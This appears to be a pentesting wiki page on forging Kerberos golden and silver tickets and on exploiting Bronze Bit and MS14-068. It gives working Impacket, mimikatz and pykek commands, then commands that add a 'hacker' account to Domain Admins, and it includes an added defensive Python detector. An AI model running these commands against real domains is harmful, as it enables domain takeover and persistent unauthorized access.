Silver and golden tickets are forged Kerberos tickets that can be used with pass-the-ticket to access services in an Active Directory domain.
Golden ticket: The NT hash (or AES key) of the special account krbtgt can be used to forge a special TGT (Ticket Granting Ticket) that can later be used with Pass-the-ticket to access any resource within the AD domain.
Silver ticket: The NT hash (or AES key) of a service account can be used to forge a Service ticket that can later be used with Pass-the-ticket to access that service
The Bronze bit vulnerability (CVE-2020-17049) introduced the possibility of forwarding service tickets when it shouldn't normally be possible (protected users, unconstrained delegation, constrained delegation configured with protocol transition).
🛠️ //TODO : MS14-068
The following parts explain how to obtain modified or crafted Kerberos tickets. Once obtained, these tickets can be used with Pass-the-Ticket.
In order to craft a golden ticket, testers need to find the krbtgt's NT hash or AES key (128 or 256 bits). In most cases, this can only be achieved with domain admin privileges through a DCSync attack. Because of this, golden tickets only allow lateral movement and not privilege escalation.
Microsoft now uses AES 256 bits by default. Forging with the AES key (instead of the NT hash, which produces an RC4 ticket) will therefore be stealthier.
There are Impacket scripts for each step of a golden ticket creation: retrieving the krbtgt NT hash or AES key, retrieving the domain SID, creating the golden ticket.
```bash
# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0

# Create the golden ticket (with an NT hash)
ticketer.py -nthash $krbtgtNThash -domain-sid $domainSID -domain $DOMAIN randomuser

# Create the golden ticket (with an AES 128/256 bits key)
ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN randomuser
```
On Windows, mimikatz (C) can be used for this attack.
```
# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt

# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt

# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$krbtgt_aes256_key /user:randomuser /ptt
```
For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.
In order to craft a silver ticket, testers need to find the target service account's NT hash or AES key (128 or 256 bits).
"While the scope is more limited than Golden Tickets, the required hash is easier to get and there is no communication with a DC when using them, so detection is more difficult than Golden Tickets." (adsecurity.org)
The Impacket script ticketer can create silver tickets.
```bash
# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0

# with an NT hash
python ticketer.py -nthash $NThash -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username

# with an AES (128 or 256 bits) key
python ticketer.py -aesKey $AESkey -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username
```
The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).
On Windows, mimikatz can be used to generate a silver ticket. Testers need to carefully choose the right SPN type (cifs, http, ldap, host, rpcss) depending on the wanted usage.
```
# with an NT hash (the NT hash of the target service account, not krbtgt's)
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$service_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$service_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt

# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$service_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
```
For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.
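An added detection-side example, not from the original page nor from Impacket or mimikatz, covering both the golden and silver ticket parts above: it runs over constructed sample Windows security events and flags the traces those tickets leave: a service ticket request (4769) for an account that does not exist in the directory (ticketer.py's example forges "randomuser"), an RC4 ticket in a domain where AES is the default, and a Kerberos network logon (4624) on a host with no matching ticket request on the DC shortly before it (the "no communication with a DC" property of silver tickets quoted above). Event IDs and encryption type codes are real; the event dict layout, host names, accounts and timestamps are constructed.

```python
from datetime import datetime

# Constructed sample data: accounts known to exist in the directory, and the
# encryption types a domain that uses AES keys by default is expected to issue.
KNOWN_ACCOUNTS = {"administrator", "jdoe", "svc_web", "srv01$"}
AES_ETYPES = {0x11, 0x12}  # AES128-CTS-HMAC-SHA1-96, AES256-CTS-HMAC-SHA1-96

# Constructed events: 4769 = service ticket requested (DC), 4624 = logon (target host).
SAMPLE_EVENTS = [
    {"id": 4769, "host": "DC01", "time": "2024-05-01T10:00:00",
     "account": "jdoe", "service": "cifs/srv01.lab.local", "etype": 0x12},
    {"id": 4624, "host": "SRV01", "time": "2024-05-01T10:00:02",
     "account": "jdoe", "logon_type": 3, "auth": "Kerberos"},
    {"id": 4769, "host": "DC01", "time": "2024-05-01T10:05:00",
     "account": "randomuser", "service": "cifs/srv01.lab.local", "etype": 0x17},
    {"id": 4624, "host": "SRV01", "time": "2024-05-01T10:30:00",
     "account": "administrator", "logon_type": 3, "auth": "Kerberos"},
]

def _ts(event):
    return datetime.fromisoformat(event["time"])

def _service_host(spn):
    # "cifs/srv01.lab.local" -> "srv01"
    return spn.split("/", 1)[1].split(".")[0].lower()

def analyze(events, known_accounts=KNOWN_ACCOUNTS, window_s=300):
    # Returns (reason, account, host) tuples for events that look like forged tickets.
    alerts = []
    tgs = [e for e in events if e["id"] == 4769]
    for e in tgs:
        # A forged TGT can carry any name (ticketer.py's example uses "randomuser").
        if e["account"].lower() not in known_accounts:
            alerts.append(("unknown_account", e["account"], e["host"]))
        # An RC4 (0x17) ticket in an AES-by-default domain points at a ticket
        # forged from an NT hash rather than from the AES key.
        if e["etype"] not in AES_ETYPES:
            alerts.append(("rc4_ticket", e["account"], e["host"]))
    for e in events:
        if e["id"] != 4624 or e.get("auth") != "Kerberos" or e.get("logon_type") != 3:
            continue
        # A silver ticket never touches the DC, so a Kerberos network logon should have
        # a matching 4769 for this host shortly before it. A ticket obtained earlier
        # than window_s is a false positive, so tune the window to the environment.
        matched = any(
            t["account"].lower() == e["account"].lower()
            and _service_host(t["service"]) == e["host"].lower()
            and 0 <= (_ts(e) - _ts(t)).total_seconds() <= window_s
            for t in tgs)
        if not matched:
            alerts.append(("logon_without_tgs", e["account"], e["host"]))
    return alerts
```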
In order to exploit the Bronze Bit vulnerability (CVE-2020-17049), attackers need to find a service able to delegate to another service (see Kerberos delegations), and they need that first service account's NT hash or AES key (128 or 256 bits).
For example, with constrained delegation configured between a controlled service and a target one, protocol transition enabled, and the target user being protected, the Impacket script getST (Python) can perform all the necessary steps to obtain the final "impersonating" service ticket (here "Administrator" is the impersonated/delegated account, but it can be any user in the environment).
The input credentials are those of the compromised service account configured with constrained delegations.
```bash
# with an NT hash
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -hashes :$Controlled_service_NThash $Domain/$Controlled_service_account

# with an AES (128 or 256 bits) key
getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -aesKey $Controlled_service_AES_key $Domain/$Controlled_service_account
```
The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org).
The MS14-068 vulnerability allows attackers to forge a TGT with unlimited power (i.e. with a modified PAC stating the user is a member of privileged groups). This attack is similar to the golden ticket; however, it doesn't require the attacker to know the krbtgt key. It is a really powerful privilege escalation technique, but it will not work on patched domain controllers.
This attack can be operated with pykek's ms14-068 Python script. The script can carry out the attack with a cleartext password or with pass-the-hash.
```bash
# with a plaintext password
ms14-068.py -u 'USER'@'DOMAIN_FQDN' -p 'PASSWORD' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'

# with pass-the-hash
ms14-068.py -u 'USER'@'DOMAIN_FQDN' --rc4 'NThash' -s 'USER_SID' -d 'DOMAIN_CONTROLLER'
```
If the attack is successful, the script will write a .ccache ticket that will be usable with pass-the-ticket.
Using the Metasploit Framework can sometimes be more useful since it prints valuable error information.
```
msf6 > use admin/kerberos/ms14_068_kerberos_checksum
```
In some scenarios, I personally have had trouble using the .ccache ticket on UNIX-like systems. What I did was convert it to .kirbi, switch to a Windows system, inject the ticket with mimikatz's kerberos::ptt command, and then create a new user and add it to the domain admins group.
```
net user "hacker" "132Pentest!!!" /domain /add
net group "Domain Admins" "hacker" /domain /add
```